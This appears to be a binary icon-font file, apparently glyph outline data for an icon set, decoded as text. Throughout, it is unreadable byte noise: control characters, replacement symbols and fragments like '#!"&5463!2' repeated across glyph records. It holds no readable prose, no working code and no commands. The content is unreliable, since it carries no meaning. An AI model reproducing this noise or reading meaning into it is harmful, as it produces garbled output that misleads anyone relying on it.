3>8L3)x3
�Ԗ�Ԗ�4LL45KK54LL45KK���
#)0C	wZl/
�
Y�	
N,&�
#)0C	vZl.
�
Y�L0"��qG^^Gq�q$ ]G)Fq�qG^^Gq�q$ ]G)Fq��%O#"'#"&'&4>7>7.546$ '&'&'# '32$7>54'�����VZ|�$2$
|��E~E<�|
$2$�|ZV���:�(t}�������X(	
&%(H�w�쉉��x�H(%&	(X�ZT\�MKG���<m$4&"24&#!4654&#+32;254'>4'654&'>7+"&'&#!"&5463!6767>763232&4&&4�N2��`@`%)7&,$)'  
%/0Ӄy�#5 +�1	&<��$]`�{t��5KK5$e:1&+'3T�F0�h��4&&4&�3M:�;b^v�+D2 5#$��I�IJ 2E=\$YJ!$MCeM��-+(K5�5K�K5y�*%A�u]c���>q4&"24&'>54'654&'654&+"+322654&5!267+#"'.'&'&'!"&5463!27>;2&4&&4�+ 5#bW���0/%
  ')$,&7)%`@``2N��h�0##�T3'"(0;e$��5KK5 t��ip��<&	1&4&&4&�#\=E2&%IURI��$#5 2D+�v^b;�:M2g�c]vDEA%!bSV2M�K5�5K(,,��MeCM$!I��@�#"&547&547%6@�?V��8������b%	I�)���94.""'."	67"'.54632>32�+C`\hxeH>Hexh\`C+�ED���4��
#L</��>�oP$$Po�>��Q|I.3MCCM3.I|Q����/����Z$_d�C�+I@$$@I+� (@%#!"&5463!2#!"3!:"&5!"&5463!462�
��w��w@

��B^^B 
���4&�@&&�&4 ` 
�w�w�
 
^B�@B^24��& &�& &�����%573#7.";2634&#"35#347>32#!"&5463!2���FtIG9;HI�x�I��<,tԩw�@w��w�w�z��4DD43EE�����ueB���&#1�s�@w��w�w�����.4&"26#!+"'!"&5463"&463!2#2��&�S3L�l&�c4LL4�4LL4c����@��&��&{�LhLLhL��'?#!"&5463!2#!"3!26546;2"/"/&47'&463!2��w��w��w��@B^^B@B^@�&4��t

r

��&&`��w��w@w�@^B��B^^B@R�&��t

r

��4&&@"&5!"&5463!462	#!"&54&>3!2654&#!*.54&>3!2���4&�@&&�&4 s�w��

@B^^B��

@w��4��& &�& &��3�@w�
 
^B�B^ 
�����
I&5!%5!>732#!"&=4632654&'&'.=463!5463!2!2�J���J���S��q*5&=CKu��uKC=&5*q͍S8( ^B@B^ (8���`N��`Ѣ�΀G�tO6)"M36J[E@@E[J63M")6Ot�G�(8`B^^B`8	���',2��6'&'&76'6'&6&'&6'&4#"7&64 654'.'&'.63226767.547&7662>76#!"&5463!2		/[		.
=���X��Ě4,+"*+, 1JH'5G:�:#L5+@=&#���w�@w��w�w�P.1GE�,��ԧ��44+	;/5cFO:>JJ>:O9W5$@(b4��@w��w�w������'?$4&"2$4&"2#!"&5463!3!267!2#!#!"&5!"'&762&4&&4&&4&&4�8(�@(88(�c==c�(8��*�&�&�*�6�&4&&4&&4&&4& ��(88(@(88HH88`(�@&&�('��@����1c4&'.54654'&#"#"&#"32632327>7#"&#"#"&54654&54>76763232632


	N<�;+gC8�A`1a9�9�g��w����|�9�8aIe$I�VN��z<�:LQJ
�,�-[%	061I��(�)W,$-������7,oIX(�)o�ζA;=N0
eTZ
	 (���O#".'&'&'&'.54767>3232>32�e^\4?P	bM��O0#382W#& 9C9
Lĉ"	82<*9FF(W283#0OMb	P?4\^eFF9*<28	"��L
9C9 &#��!"3!2654&#!"&5463!2`��B^^B@B^^ީw��w��w@w�^B��B^^B@B^���w��w@w�����#!72#"'	#"'.546763���YY�!''!0#�G�G$/!''!�&�UU�jZ	
8"��"8
 ��X!	
8"	"8
	���GW4.'.#"#".'.'.54>54.'.#"32676#!"&5463!2 1.-
+$)
c�8
)1)

05.D
<9�0)$9��w�@w��w�w�W

)1)
7�c
)$+
-.1 �9$)0���<
D.59�@w��w�w��,T1# '327.'327.=.547&54632676TC_L��Ҭ���#+�i�!+*p�DNBN,y[����`m`%i]hbE����m��}a�u&,�SXK��
&$��f9s?
_���#"!#!#!54632��V<%'����Э��HH���	�(ں����T\dksz�� &54654'>54'6'&&"."&'./"?'&546'&6'&6'&6'&6'&74"727&6/�a���49[aA)O%-j'&]�]5r-%O)@a[9'
0BA;+


>HC���U


	#	
	
$				2	
AC: �����oM�=a-6O�UwW[q	( -	q[WwU�P6$C

+) (	
8&/
&eM���a�	
&
$	

��%+"&54&"32#!"&5463!54 �&@&�Ԗ`(88(�@(88(�r��&&j��j�8(��(88(@(8��������#'+2#!"&5463"!54&#265!375!35!�B^^B��B^^B
�

��
`���^B�@B^^B�B^�
��
�
`��
�������!="&462+"&'&'.=476;+"&'&$'.=476;�p�pp�p�$���!�$qr�
�%���}�#ߺ���pp�p��!�E$�
�rq�ܢ#���
%�
ֻ��!)?"&462"&4624&#!"3!26!.#!"#!"&547>3!2/B//B//B//B�
�@

�
�2�����^B�@B^�\77\�aB//B//B//B/�@

��
��

�~��B^^B@2^5BB5��2���.42##%&'.67#"&=463! 2�5KK5L4�_�u:B&1/&��.-
zB^^B���4L��v��y�KjK��4L[!^k'!A3;):2*�<vTq6^B�B^�L4�$���)��*@��A4#"&54"3!4."#!"&5!"&5>547&5462�;U gI�v��0Z���Z0�L4�@�Ԗ�@4L2RX='�8P8��'=XR� U;Ig0,3lb??bl3���4Lj��jL4*\���(88(�����\���}I/#"/'&/'&?'&'&?'&76?'&7676767676`�
(�5)�0
)��*)
0�)5�(
��
(�5)�0
))��))
0�)5�(
��*)
0�)5�(��
)�5)�0
)*��*)
0�)5�)
��
)�5)�0
)*���5h$4&"24&#!4>54&#"+323254'>4'654&'!267+#"'&#!"&5463!2>767>32!2&4&&4�N2��$YGB
(HGEG  H��Q�#5K4L��i�!<�����;��5KK5 
A#
("/?&}�vh��4&&4&�3M95S+C=�,@QQ9��@@�IJ 2E=L5i�>9eM��E;K5�5K	J7R>@#�zD<����5=q%3#".'&'&'&'.#"!"3!32>$4&"2#!"#"&?&547&'#"&5463!&546323!2`  #A<(H(GY$��2NL4K5#aWTƾh&4&&4�K5��;����=!�i��hv�}&?/"(
#A
 5K��2*!	Q@.'!&=C+S59M34L=E2 JI UR@@&4&&4&���5K;E��Lf9>�ig�<Dz�#@>R7J	K�5h4&"24#"."&#"4&#"".#"!54>7#!"&54.'&'.5463246326326&4&&4��IJ 2E=L43M95S+C=�,@QQ9�@@�E;K5��5K	J7R>@#�zD<�gi�>9eM��Z4&&4&<�#5K4LN2��$YGB
(HGEG  H��V���;��5KK5 
A#
("/?&}�vh��i�!<��4<p4.=!32>332653272673264&"2/#"'#"&5#"&54>767>5463!2�@@��2*!	Q@.'!&=C+S59M34L.9E2 JI UR�&4&&4&��Lf6A�ig�6Jy�#@>R7J	K5�5K;E@TƾH  #A<(H(GY$��2NL4K#5#a=4&&4&�D��=�i��hv�}&?/"(
#A
 5KK5��;�����+54&#!764/&"2?64/!26 $$ &�
�[6��[[j6[��&���^����a�a@�&�4[��[6[��[6�&+�^����a�a�����+4/&"!"3!277$ $$ [��6[��
&&��[6j[
���^����a�ae6[j[6�&�&�4[j[��^����a�a�����+4''&"2?;2652?$ $$ ��[6[��[6�&�&�4[���^����a�af6j[[��6[��
&&��[��^����a�a�����+4/&"4&+"'&"2? $$ [6�&�&�4[j[6[j���^����a�ad6[��&&�
�[6��[[j��^����a�a������  $2>767676&67>?&'4&'.'.'."#&6'&6&'3.'.&'&'&&'&6'&>567>#7>7636''&'&&'.'"6&'6'..'/"&'&76.'7>767&.'"76.7"7"#76'&'.'2#22676767765'4.6326&'.'&'"'>7>&&'.54>'>7>67&'&#674&7767>&/45'.67>76'27".#6'>776'>7647>?6#76'6&'676'&67.'&'6.'.#&'.&6'&.5/�a����^����D&"	


	4
	$!	#
	
		
	



 
.0"�Y
	+


!	
	

$	
	"
+


		
	�Α	
		
����^����a�a��

	

			
	

	

		
	
		P� '-(	#	*	$

"
!				
*
!	

(				

	
��$�
		
2
�~�/$4&"2	#"/&547#"32>32�&4&&4��V%54'j&&�'��/덹���:,���{	&4&&4&�V%%l$65&�b��'C��r!"��k[G�+;%!5!!5!!5!#!"&5463!2#!"&5463!2#!"&5463!2����������&��&&�&&��&&�&&��&&�&�������@�&&&&�&&&&�&&&&��{#"'&5&763!2{�'
��**�)��*��)'/!5!#!"&5!3!26=#!5!463!5463!2!2���^B�@B^�&@&`��^B`8(@(8`B^��� B^^B�&&�����B^�(88(�^���G	76#!"'&?	#!"&5476	#"'&5463!2	'&763!2#"'��c�)'&�@*������*�@&('�c���(&�*�cc�*�&'
����*�@&('�c���'(&�*�cc�*�&('���c�'(&�@*��19AS[#"&532327#!"&54>322>32"&462 &6 +&'654'32>32"&462Q�g�Rp|Kx;CB��y��y� 6Fe=
BP���PB
=eF6 ��Ԗ��V����>!pR�g�QBC;xK|��Ԗ���{QNa*+%��x��x5eud_C(+5++5+(C_due2Ԗ�Ԗ�����>�NQ{u�%+*jԖ�Ԗ��p�!Ci4/&#"#".'32?64/&#"327.546326#"/&547'#"/&4?632632��(* 8(!�)(��A�('��)* 8(!U�SxyS�SXXVzxT�TU�SxyS�SXXVzxT�@(� (8 *(���(��'(�(8 ���S�SU�Sx{VXXT�T�S�SU�Sx{VXXT���#!"5467&5432632�������t,Ԟ;F`j�)��������6�,��>�jK?�s��
�!%#!"&7#"&463!2+!'5#�8Ej��jE8�@&&&&@������XYY�&4&&4&�qD�S�%��q%��N\jx��2"&4#"'#"'&7>76326?'&'#"'.'&676326326&'&#"32>'&#"3254?''7�4&&4&l��
�NnbS���VZbR��SD	
zz
	DS��Rb)+U���Sbn�
��\.2Q\dJ'.2Q\dJ.Q2.'Jd\Q2.'Jd`!O�`��	`�����&4&&4�r$#@�B10M�5TNT{L�5T
	II	
T5�L;l'OT4�M01B�@#$�*�3;$*�3;�;3�*$;3�*$�:$/� @@�Qq`��@���"%3<2#!"&5!"&5467>3!263!	!!#!!46!#!�(88(�@(8��(8(�`(�(8D<���+����+�<��8(�`(��8(�`�8(�@(88( 8(�(`�(8(��(������<��`(8��(`����`(8����||?%#"'&54632#"'&#"32654'&#"#"'&54632|�u�d��qܟ�s]
=
��Ofj�L?R@T?��"&�
>
�f?rRX=Ed�u�ds���q��
=
_M�jiL��?T@R?E& �f
>
�=XRr?��b���!1E)!34&'.##!"&5#3463!24&+";26#!"&5463!2����
��
08(��(8��8(@(8��
�

�
�8(��(88(�(`(����1

�`(88(���(88(@

��
�`(88(@(8(��`���#!"&5463!2�w�@w��w�w�`�@w��w�w��/%#!"&=463!2#!"&=463!2#!"&=463!2&��&&�&&��&&�&&��&&�&��&&�&&�&&�&&�&&�&&��@'7G$"&462"&462#!"&=463!2"&462#!"&=463!2#!"&=463!2�p�pp�pp�pp��
�@

�
��p�pp��
�@

�

�@

�
Рpp�p��pp�p���

�
�pp�p���

�
�

�
��<L\l|#"'732654'>75"##5!!&54>54&#"'>3235#!"&=463!2!5346=#'73#!"&=463!2#!"&=463!2}mQjB919+i1$AjM_3<��/BB/.#U_:IdDRE�
�@
�
����k*G�j�
�@
�

�@

�
TP\BX-@8
C)5�XsJ@�$3T4+,:;39SG2S.7<���

�vcc)�)%L�l�}�

��

�
���5e2#!"&=463%&'&5476!2/&'&#"!#"/&'&=4'&?5732767654'&��@�0��2uBo
T25XzrDCBB�Eh:%��)0%HPIP{rQ�9f#-+>;I@KM-/Q"�@@@#-bZ��$&P{<�8[;:XICC>.�'5oe80#.0(
l0&%,"J&9%$<=DTI���cs&/6323276727#"327676767654./&'&'737#"'&'&'&54'&54&#!"3!260%
<4�"VRt8<@<
-#=XYhW8+0$"+dT�Lx-'I&JKkm��uw<=V�@�!X@		v
'��|N;!/!$8:I�Ob�V;C#V

&
(���mL.A:9 !./KLwP�M�$��@@
��/?O_o��%54&#!"3!2654&#!"3!2654&#!"3!2654&#!"3!2654&#!"3!2654&#!"3!2654&#!"3!2654&#!"3!2654&#!"3!26#!"&5463!2��@��@��@���@��@��@���@��@��@�^B��B^^B@B^�����������������������������N��B^^B@B^^���#+3	'$"/&4762%/?/?/?/?�%k��*��6�6��bbbb|��<<��<�bbbb��bbbb�%k���6���6Ƒbbb��<<��<<�^bbbbbb@��M$4&"2!#"4&"2&#"&5!"&5#".54634&>?>;5463!2�LhLLh����
	�	LhLLhL!'�Ԗ���Ԗ@'!&	
�?�&&LhLLhL�	�	
��hLLhL��	j��jj��j	&@6/"
��&&���J#"'676732>54.#"7>76'&54632#"&7>54&#"&54$ ���ok;	-j=y�hw�i�[+PM3ѩ���k=J%62>Vc��a�aQ�^��� ]G"�'9��r�~:`}�Ch�  0=Z�٤���W=#uY2BrUI1�^Fk[|��a�����L2#!67673254.#"67676'&54632#"&7>54&#"#"&5463�w��w�+U	,i<��F{�jh�}Z+OM

2ϧ���j<J%51=Ub�w��w��w�@w�zX"�'8'�T�yI9`{�Bf� 
,>X�բ���W<"uW1AqSH1�bd��w�w����'74'!3#"&46327&#"326%35#5##33#!"&5463!2����0U6c��c\=hl���ࠥ�Ymmnnnn�w�@w��w�w�w&�46#�Ȏ;ed����wnnnnn��@w��w�w����	]#/#"$&6$3 &#"32>7!5!%##5#5353����Е���tt����u�{�zz�{S�ZC�`�c�����o���t�*�t��q|��|.EXN#�??�������,<!5##673#$".4>2"&5!#2!46#!"&5463!2��r�M*
�*M~�~M**M~�~M*j����jj����&�&&&�`��P%��挐|NN|���|NN|�*�jj���jj�@��&&�&&@�
"'&463!2�@4�@&�Z4�@�4&@
#!"&4762&��&�4�Z4&&4��@@���
"'&4762�&4�@�4&@��&�4�&�@�
"&5462@�@4&&4��4�@&�&�@����
3!!%!!26#!"&5463!2�`��m��`
�^B��B^^B@B^���
 `���@B^^B�B^^��@
"'&463!2#!"&4762�@4�@&�&&��&�4��4�@�4&Z4&&4��@��
"'&463!2�@4�@&��4�@�4&@
#!"&4762&��&�4�Z4&&4��@��:#!"&5;2>76%6+".'&$'.5463!2^B�@B^,9j�9Gv33vG9�H9+bI��\
A+=66=+A
[��">nSM�A_:��B^^B1&�c*/11/*{�'VO�3��@/$$/@�*�?Nh^��l+!+"&5462!4&#"!/!#>32]��_gTRdg�d���QV?U��I*Gg?����!�2IbbIJaa���iwE33����00� 08����4#"$'&6?6332>4.#"#!"&54766$32z�䜬��m�
I�wh��QQ��hb�F�*�@&('�k�������z��
�	
_hQ��н�QGB�'(&�*�eoz�(���q!#"'&547"'#"'&54>7632&4762.547>32#".'632�%k'45%��&+�~(
(�h		&

\(
(�		&

~+54'k%5%l%%l$65+~

&		�(
(\

&		�h(
(~�+%��'��!)19K4&"24&"26.676&$4&"24&"24&"2#!"'&46$ �KjKKjKjKKj�e2.e<^P��,bKjKKj��KjKKjKjKKj��#��#���LlL�KjKKjKjKKjK��~-��M<M�(PM<rjKKjK�jKKjKujKKjK�������L���< 6?32$6&#"'#"&'5&6&>7>7&54$ L�h��я�W.�{+9E=�c��Q�d�FK��1A
0)���������p�J2`[Q?l&������٫�C58.H(Y��'����:d 6?32$64&$ #"'#"&'&4>7>7.546'&'&'# '32$7>54'Y����j`a#",5NK�
����~E�����VZ|�$2$
|��:
$2$�|ZV���:�(t}�����h�fR�88T
h�̲����X(	
&%(H�w��(%&	(X�ZT\�MKG�{x��|�!#"'.7#"'&7>3!2%632u��

�j
�H����{(e9
�1b���U#!"&546;5!32#!"&546;5!32#!"&546;5463!5#"&5463!2+!2328(��(88(`�`(88(��(88(`�`(88(��(88(`L4`(88(@(88(`4L`(8 ��(88(@(8��8(��(88(@(8��8(��(88(@(8�4L�8(@(88(��(8�L4�8����OY"&546226562#"'.#"#"'.'."#"'.'.#"#"&5476$32&"5462��И&4&NdN!>!
1X:Dx++w�w++xD:X1
-�U��
�!�*,*&4&��h��h&&2NN2D&

..J<
$$
<JJ<
$$
<J..

��P���bb&&�7!!"&5!54&#!"3!26!	#!"&=!"&5463!2��`(8��
�@

�
+��8(�@(8��(88(@(8�(��8(� @

@
�m+�U�`(88(�8(@(88(��
�h`���(\"&54&#"&46324."367>767#"&'"&547&547&547.'&54>2�l4

2cK�Eo���oED
)
�
�
�
)
D�g-;</-
?.P^P.?
-/<;-gY�����Y�

.2 L4H|O--O|HeO,����,Oe�q1Ls26%%4.2,44,2.4%%62sL1q�c�qAAq����4#!#"'&547632!2#"&=!"&=463!54632
��
��		@	
`
	��	
��

`?`�
�

@	
	@	
�!	��	
�
�
�
����54&+4&+"#"276#!"5467&5432632�
�
�
	`		_
�������v,Ԝ;G_j�)��``

��
	��		_ԟ����7
�,��>�jL>���54'&";;265326#!"5467&5432632	��		��
�
�
�
�������v,Ԝ;G_j�)���	`		����

`������7
�,��>�jL>�����X`$"&462#!"&54>72654&'547 7"2654'54622654'54&'46.' &6 �&4&&4&�y��y�%:hD:Fp�pG9�F�j� 8P8 LhL 8P8 E;
Dh:%������>�4&&4&}y��yD~�s[4D�d=PppP=d�>hh>@�jY*(88(*Y4LL4Y*(88(*YDw"
A4*[s�~����>�����M4&"27 $=.54632>32#"' 65#"&4632632 65.5462&4&&4�G9��������&
<#5KK5!��!5KK5#<
&ܤ��9Gp�p&4&&4&@>b�u��ោؐ&$KjK�nj��j�KjK$&����j��j�b>Ppp���
%!5!#"&5463!!35463!2+32����@\��\���8(@(8�\@@\������\@\���(88(��\��@��34#"&54"3#!"&5!"&5>547&5462�;U gI@L4�@�Ԗ�@4L2RX='�8P8��'=XR� U;Ig04Lj��jL4*\���(88(�����\��@"4&+32!#!"&+#!"&5463!2�pP@@P���j�j�@�@�\�@\�&��0�p����j��	��� \��\�&��-B+"&5.5462265462265462+"&5#"&5463!2�G9L4�4L9G&4&&4&&4&&4&&4&L4�4L�
��&���=d��4LL4d=�&&�`&&�&&�`&&�&&��4LL4
 ��&�#3CS#!"&5463!2!&'&!"&5!463!2#!"&52#!"&=4632#!"&=463�(8(��(88(�(`�x
��c�`(8���@��@��@�`(��(88(@(8(D��9�8(��`@�@@�@@��/?O_o��������-=%+"&=46;25+"&=46;2+"&=46;2%+"&=46;2+"&=46;2%+"&=46;2%+"&=46;2%+"&=46;2+"&=46;2%+"&=46;2%+"&=46;2%+"&=46;2+"&=46;2%+"&=46;2%+"&=46;2+"&=46;2%+"&=46;2+"&=46;2!!!5463!2#!"&5463!2�
@

@

@

@

@

@
�
@

@

@

@
�
@

@
�
@

@
�
@

@

@

@
�
@

@
�
@

@
�
@

@

@

@
�
@

@
�
@

@

@

@
�
@

@

@

@
�����
@
&�&&&�@

@
�@

@

@

@
�@

@
��@

@
�@

@
�@

@
�@

@
��@

@
�@

@
�@

@
�@

@
��@

@
�@

@
�@

@
��@

@
�@

@

@

@
����

`��&&�&&
��/?O_o�����%+"&=46;25+"&=46;2+"&=46;2%+"&=46;2+"&=46;2%+"&=46;2%+"&=46;2+"&=46;2%+"&=46;2+"&=46;2!!#!"&=!!5463!24&+"#54&+";26=3;26%#!"&5463!463!2!2�
@

@

@

@

@

@
�
@

@

@

@
�
@

@
�
@

@

@

@
�
@

@

@

@
���8(�@(8��
@

@
�
@

@
�
@
&�&&@8(�(8@&�@

@
�@

@

@

@
�@

@
��@

@
�@

@
�@

@
��@

@
�@

@

@

@
��� (88( ���

�@

``

��

``
-�&&& (88(��&@����<c$4&"2!#4&"254&+54&+"#";;26=326+"&5!"&5#"&46346?>;463!2�KjKKj�����KjKKj�������&��Ԗ���Ԗ�&&�@�&�&KjKKjK��
��jKKjK ������.��&j��jj��j&4&�@�@&&���#'1?I54&+54&+"#";;26=326!5!#"&5463!!35463!2+32����������� \��\����8(@(8�\  \����������\@\���(88(��\����:
#32+53##'53535'575#5#5733#5;2+3����@��E&&`�@@��`  ����  `��@@�`&&E%@�`��@ @ @��		 �� � � � �� 		��@ 0
@��!3!57#"&5'7!7!��K5�������@ � � @���5K�@����@@��� �����#3%4&+"!4&+";265!;26#!"&5463!2&�&�&�&&�&&�&�w�@w��w�w���&&��@&&��&&@��&&��@w��w�w�����#354&#!4&+"!"3!;265!26#!"&5463!2&��&�&��&&@&�&@&�w�@w��w�w�@�&@&&��&�&��&&@&:�@w��w�w��-M�3)$"'&4762	"'&4762	s
2

�.

�

2

�w��
2

�.

�

2

�w��
2

�

�

2

�w�w

2

�

�

2

�w�w
M�3)"/&47	&4?62"/&47	&4?62S
�.

2

��w

2

��
�.

2

��w

2

�M
�.

2

��

2

�.

�.

2

��

2

�.M�3S)$"'	"/&4762"'	"/&47623
2

�w�w

2

�

�

2

�w�w

2

�

��
2

��w

2

�

�.v
2

��w

2

�

�.M�3s)"'&4?62	62"'&4?62	623
�.

�.

2

��

2

�.

�.

2

��

2�
�.

�

2

�w�

2v
�.

�

2

�w�

2-Ms3	"'&4762s
�w�

2

�.

�

2�
�w�w

2

�

�

2
MS3"/&47	&4?62S
�.

2

��w

2

�M
�.

2

��

2

�.M
3S"'	"/&47623
2

�w�w

2

�

�m
2

��w

2

�

�.M-3s"'&4?62	623
�.

�.

2

��

2-
�.

�

2

�w�

2���/4&#!"3!26#!#!"&54>5!"&5463!2
��

@
�^B��  &�&  ��B^^B@B^ @

��
M��B^%Q=
&&<P&^B@B^^�+3"&5463!2#3!2654&#!"3#!"&=324+"3�B^^B@B^^B��
@

��
`�^B��B^�p�^B�B^^B�@B^`�@

�
�S`(88(``  ��'$4&"2%4&#!"3!26#!"&5463!2�&4&&4�
��

@
�^B��B^^B@B^f4&&4&��

�@
��B^^B@B^^/$4&"2%4&#!"3!264+";%#!"&5463!2�/B//B�
�


���0L4�4LL44L_B//B/��

�@
M   �4LL44LL���  >& $$ ������(���r���^����a�a��������(���^����a�a����!C#!"&54>;2+";2#!"&54>;2+";2pP��PpQ��h@&&@j�8(�Pp�pP��PpQ��h@&&@j�8(�Pp@��PppP�h��Q&�&�j (8pP��PppP�h��Q&�&�j (8p��!C+"&=46;26=4&+"&5463!2+"&=46;26=4&+"&5463!2Q��h@&&@j�8(�PppP�Pp�Q��h@&&@j�8(�PppP�Pp��@h��Q&�&�j (8pP�PppP�@h��Q&�&�j (8pP�Ppp@�@�	#+3;G$#"&5462"&462"&462#"&462"&462"&462"&462#"&54632K54LKj=KjKKj��KjKKj�L45KKjK�<^�^^��KjKKj��p�pp���\]��]\��jKL45K��jKKjKujKKjK��4LKjKK�^^�^��jKKjK��pp�p�r]��]\����� $$ ���^����a�aQ�^����a�a�����,#"&5465654.+"'&47623 #>bq��b�&4�4&�ɢ5����"		#D7e�uU6�&4&��m����1X".4>2".4>24&#""'&#";2>#".'&547&5472632>3�=T==T=�=T==T=��v)�G�G�+v�@b��R�R��b@�=&����\N����j!>�3l�k����i�k3�hPTDDTPTDDTPTDDTPTDD|x��xX�K--K��|Mp<#	)>dA{��RXtfOT# RNftWQ���,%4&#!"&=4&#!"3!26#!"&5463!2!28(�@(88(��(88(�(8��\�@\��\@\��\���(88(@(88(�@(88�@\��\�\��\ �u�'E4#!"3!2676%!54&#!"&=4&#!">#!"&5463!2!232�5��([��5@(\&��8(��(88(��(8,�9.��+�C��\��\@\� \��6Z]#+��#,k��(88(@(88(��;5E�>:��5E�\�\��\ �\�1. ���$4@"&'&676267>"&462"&462.  > $$ n%��%/���02�
KjKKjKKjKKjKf���ff�������^����a�a�y��y/PccP/�jKKjKKjKKjK���ff���ff�@�^����a�a�����$4@&'."'.7>2"&462"&462.  > $$ n20���/%��7KjKKjKKjKKjKf���ff�������^����a�a3/PccP/y��	jKKjKKjKKjK���ff���ff�@�^����a�a�����+7#!"&463!2"&462"&462.  > $$ �&��&&��&KjKKjKKjKKjKf���ff�������^����a�a�4&&4&�jKKjKKjKKjK���ff���ff�@�^����a�a���#+3C54&+54&+"#";;26=3264&"24&"2$#"'##"3!2@������@KjKKjKKjKKjK����ܒ���,����������gjKKjKKjKKjK�X�Ԁ�,�,��#/;GS_kw�����+"=4;27+"=4;2'+"=4;2#!"=43!2%+"=4;2'+"=4;2+"=4;2'+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;54;2!#!"&5463!2�``����``��`��``�``�``�``�``�``�````�p`���K5��5KK5�5Kp``�``�``��``�``�``��``�``��``��``�````��`��������5KK5�5KK@���*V#"'.#"63232+"&5.5462#"/.#"#"'&547>32327676���R?d�^��7ac77,9x�m#@#KjK�#
ڗXF@Fp:f��_ #W��Ip�p&3z�	�h[ 17��q%q#:��:#5KKu�'t#!X:	%�#+=&>7p@���*2Fr56565'5&'.	#"32325#"'+"&5.5462#"/.#"#"'&547>32327676@��ͳ�����8
2.,#,f�k*1x���-!���#@#KjK�#
ڗXF@Fp:f��_ #W��Ip�p&3z�	�e�`��v�o�8�t-�	�:5	��[�*�#:��:#5KKu�'t#!X:	%�#+=&>7p
�3$	"/&47	&4?62#!"&=463!2I�.

2

��w

2

�
-�@�)�.

2

��

2

�.
�-@@-��S�$9%"'&4762		/.7>	"/&47	&4?62i2

�.

�

2

�w�
E��>

u>

��.

2

��w

2

�
�2

�

�

2

�w�w
!��




�h�.

2

��

2

�.
���;#"'&476#"'&7'.'#"'&476�'
�)'�s
"+5+�@ա'
�)'����F*4*E�r4�M:�}}8��GO
�*4*������~�
(-/'	#"'%#"&7&67%632���B�;><���V�?�?V�� -����-C�4
<B�=�cB5���!%��%!�b 7I�))�9I7���	#"'.5!".67632y��(
��#

��##@,(
�)���8!	!++"&=!"&5#"&=46;546;2!76232-S��S����������S�

		��S��S�`���`���		

������K$4&"24&"24&"27"&5467.546267>5.5462 8P88P88P88P�8P88P�4,�C��S,4p�p4,,4p�p4,6d7AL*',4p�pP88P8�P88P8HP88P8`4Y��&+(>EY4PppP4Y4Y4PppP4Y�%*<O4Y4Ppp���
%@\ht�	"'&4762"&5462&#!"&463!2#"'&'7?654'7&#"&'&54?632#!"&463!2"&5462"'&4762��		

	����@U�SxyS���R���#PT����('�#��TU�SxySN���@����		

		�		

		
3��@��xS�SUO#���'(���V^�'(���PVvxS�SU��i��@��		

		
`�<+"&=46;2+"&=467>54&#"#"/.7!2���<'G,')7��N;2]=A+#H

�
�0P��R��H6^;<T%-S�#:/*@Z}


>h���.%#!"&=46;#"&=463!232#!"&=463!2�&�&&@@&&�&@&�&�&&&��&&�&�&�&&��&f�&&�&&b�#!"&=463!2#!"&'&63!2&�&&&'�'%@% �&&�&&�&&&&�k%J%#/&'#!53#5!36?!#!'&54>54&#"'6763235���
����Ź���}���4NZN4;)3.i%Sin�1KXL7觧�*		��#��&		*������@jC?.>!&1'\%Awc8^;:+<!P��%I%#/&'#!53#5!36?!#!'&54>54&#"'6763235���
����Ź���}���4NZN4;)3.i%Pln�EcdJ觧�*		��#��&		*������-@jC?.>!&1'\%AwcBiC:D'P%!	#!"&'&6763!2�P������&:�&?�&:&?����5"K�,)""K,)���h#".#""#"&54>54&#"#"'./"'"5327654.54632326732>32�YO)I-D%n "h.=T#)#lQTv%.%P_�	%	
%�_P%.%vUPl#)#T=@�/#,-91P+R[�Ql#)#|'�'
59%D-I)OY[R+P19-,##,-91P+R[YO)I-D%95%�_P%.%v���'3!2#!"&463!5&=462 =462 &546 ����&&��&&��&4&r&4&�������@����&4&&4&�G݀&&������&&f��������
��sCK&=462	#"'32=462!2#!"&463!5&'"/&4762%4632e*&4&i����76`al�&4&���&&��&&}n�

R

�

R
�z����f�Oego�&&�5�����`3��&&����&4&&4&�
D�

R

�

R
z����v���"!676"'.5463!2@�@w^�Cc�t~55~t�cC&�&@���?J���V��|RIIR|��V&&��#G!!%4&+";26%4&+";26%#!"&546;546;2!546;232�����@@@@�L4��4LL4�^B@B^�^B@B^�4L�� �� ��N�4LL44L`B^^B``B^^B`L����L4&"2%#"'%.5!#!"&54675#"#"'.7>7&5462!467%632&4&&4��@�o�&�&}c ;pG=(
8Ai8^�^.�&4&&4&`��	`f�s��&& j�o/;J!#2
 KAE*,B^^B!`	$� ��-4&"2#"/&7#"/&767%676$!2�8P88P��Qr��	@
U���	@�
{`P�TP88P8�����P`��
�	@U	@�rQ���!6'&+!!!!2Ѥ���
8�������̙�e�;<*��@8 !�G��G�GQII���� %764'	64/&"2 $$ �f��3f4�:�4����^����a�a�f4334f�:4�:�^����a�a����� %64'&"	2 $$ ���:4f3��f4F���^����a�a��4�f4���4f�^����a�a����� 764'&"27	2 $$ �f�:4�:f4334����^����a�a�f4��:4f3���^����a�a����� %64/&"	&"2 $$ -�f4���4f�4����^����a�a��4f��3f4�:w�^����a�a���@��7!!/#35%!'!%j��/d��
�jg2�|�8�����������55���dc ��b���@��!	!%!!7!���FG)��D�H:�&�H����d���S)��U4&"2#"/ $'#"'&5463!2#"&=46;5.546232+>7'&763!2�&4&&4f]w�q�4�qw]	`dC���&&�:F�ԖF:�&&���Cd`�4&&4&����	]����]	`d[}�&�&�"uFj��jFu"�&�&�y}[d�#2#!"&546;4 +"&54&" (88(�@(88( r&@&�Ԗ8(��(88(@(8@����&&j��j�����'3"&462&    .  > $$ �Ԗ������>a��X��,��f���ff�������^����a�a�Ԗ�Ԗ�a>����T�X��,�,�~�ff���ff�@�^����a�a����/+"&=46;2+"&=46;2+"&=46;2�8(�(88(�(88(�(88(�(88(�(88(�(8 �(88(�(88(�(88(�(88(�(88(�(88��/+"&=46;2+"&=46;2+"&=46;2�8(�(88(�(88(�(88(�(88(�(88(�(8 �(88(�(88�(88(�(88�(88(�(88���5E$4&"2%&'&;26%&.$'&;276#!"&5463!2KjKKj�
���
��
�
f���	

�\�
�
�w�@w��w�w��jKKjK"�G

�
ܚ

��f


�
���

